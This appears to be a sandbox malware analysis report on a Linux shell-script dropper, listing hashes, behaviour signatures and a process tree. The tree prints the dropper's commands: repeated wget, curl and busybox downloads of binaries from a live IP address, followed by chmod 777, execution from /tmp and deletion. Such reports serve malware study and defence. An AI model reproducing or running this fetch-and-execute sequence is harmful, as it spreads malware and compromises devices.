Analysis
-
max time kernel
66s -
max time network
68s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 01:39
Static task
static1
Behavioral task
behavioral1
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh
-
Size
10KB
-
MD5
c27e3dbba79b6afbd8c32c4e50cffe76
-
SHA1
b2ec5ed7bd931b3a3b970e1d5d209d031219a547
-
SHA256
13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040
-
SHA512
382804bca6a3c36dfe896726e67efbf903aede59316574bba39dd8b943f31a5caefcd2d666eb0bd1513c38a33fcde0e4d9245781648860f8c077675e5206f023
-
SSDEEP
192:mhN4hJ8oKCm/mPmympmFmO/1JdUJh1s8hN4hJRJdUJhXm/mPmympmFmWo:eoKnue3kYO/Isrue3kYWo
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 963 chmod 981 chmod 867 chmod 891 chmod 897 chmod 951 chmod 753 chmod 826 chmod 854 chmod 921 chmod 885 chmod 903 chmod 957 chmod 975 chmod 791 chmod 816 chmod 810 chmod 879 chmod 915 chmod 933 chmod 945 chmod 969 chmod 747 chmod 873 chmod 909 chmod 939 chmod 741 chmod 927 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw 742 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF 748 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB 754 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o 792 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey 811 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod 817 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG 827 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 855 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq 868 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca 874 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp 880 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n 886 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL 892 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz 898 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp 904 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n 910 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL 916 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz 922 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o 928 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw 934 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF 940 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB 946 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca 952 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey 958 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod 964 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG 970 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 976 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq 982 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod curl File opened for modification /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 curl File opened for modification /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF curl File opened for modification /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey curl File opened for modification /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp curl File opened for modification /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n curl File opened for modification /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB curl File opened for modification /tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n curl File opened for modification /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o curl File opened for modification /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL curl File opened for modification /tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4 curl File opened for modification /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca curl File opened for modification /tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod curl File opened for modification /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG curl File opened for modification /tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp curl File opened for modification /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz curl File opened for modification /tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF curl File opened for modification /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq curl File opened for modification /tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz curl File opened for modification /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw curl File opened for modification /tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB curl File opened for modification /tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw curl File opened for modification /tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL curl File opened for modification /tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o curl File opened for modification /tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca curl File opened for modification /tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey curl File opened for modification /tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG curl File opened for modification /tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq curl
Processes
-
/tmp/13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh/tmp/13f9c3ed50c26b9112e9e22469f5face1bf594623f0369925501490d0bdef040.sh1⤵PID:710
-
/bin/rm/bin/rm bins.sh2⤵PID:715
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:721
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:732
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:739
-
-
/bin/chmodchmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- File and Directory Permissions Modification
PID:741
-
-
/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Executes dropped EXE
PID:742
-
-
/bin/rmrm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:743
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:744
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:745
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:746
-
-
/bin/chmodchmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:752
-
-
/bin/chmodchmod 777 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- File and Directory Permissions Modification
PID:753
-
-
/tmp/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB./9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵
- Executes dropped EXE
PID:754
-
-
/bin/rmrm 9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:755
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:756
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:772
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:786
-
-
/bin/chmodchmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Executes dropped EXE
PID:792
-
-
/bin/rmrm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:795
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:797
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:809
-
-
/bin/chmodchmod 777 L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey./L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm L3L3AWJWz1jZhxSYZHCvA9q8LdsOc9rGey2⤵PID:812
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:813
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:815
-
-
/bin/chmodchmod 777 vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod./vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵
- Executes dropped EXE
PID:817
-
-
/bin/rmrm vlBRkxc2pXZfCqjxBIXpWIdWRcl8qgnFod2⤵PID:818
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:819
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:821
-
-
/bin/chmodchmod 777 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- File and Directory Permissions Modification
PID:826
-
-
/tmp/5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG./5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵
- Executes dropped EXE
PID:827
-
-
/bin/rmrm 5ZJMWA4qvJDnVJiAuQPlROzRn70kAg8FpG2⤵PID:830
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:840
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:849
-
-
/bin/chmodchmod 777 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta4./2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵
- Executes dropped EXE
PID:855
-
-
/bin/rmrm 2ffYLp5CKNrI7Xt5HXl6mWqJj4hneNkta42⤵PID:858
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:860
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:866
-
-
/bin/chmodchmod 777 qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq./qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm qkWlgSeyWC2V2IsRcOXMQJnDkM0rWsXBQq2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:872
-
-
/bin/chmodchmod 777 SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca./SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm SDrKCJtYQfPpcBO9zir4tVbwwn8j2iJ4ca2⤵PID:875
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:876
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:878
-
-
/bin/chmodchmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:884
-
-
/bin/chmodchmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:890
-
-
/bin/chmodchmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:896
-
-
/bin/chmodchmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:902
-
-
/bin/chmodchmod 777 ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp./ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm ZrOu6tdk58CseIasnHvicT7lv5b5p3J0lp2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:906
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:908
-
-
/bin/chmodchmod 777 IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n./IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵
- Executes dropped EXE
PID:910
-
-
/bin/rmrm IJEzh1uTvmlhGMzNEEJLk7CpaJwvhMUl3n2⤵PID:911
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:912
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:914
-
-
/bin/chmodchmod 777 YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL./YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm YQzjeqdjPWW0X4OgsHKCnzGh5JEljgdNWL2⤵PID:917
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:920
-
-
/bin/chmodchmod 777 BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz./BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm BoL8zZfA0u5ENOdqorecUs1vqQakkbJsBz2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:926
-
-
/bin/chmodchmod 777 jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o./jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm jRM4slh846TuCfMSUvIaQLCg29n4oFbP3o2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:932
-
-
/bin/chmodchmod 777 xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw./xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm xOXcb0EhgEUriloemCzxNbO7pDrV8hlUkw2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:938
-
-
/bin/chmodchmod 777 fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/fBl2KigufHZnmQqWghZFomThmvhAVfHNsF./fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm fBl2KigufHZnmQqWghZFomThmvhAVfHNsF2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9ekUy3pPFLPyGLw2h6RfxlOZRK2qt1lZFB2⤵PID:942
-
-
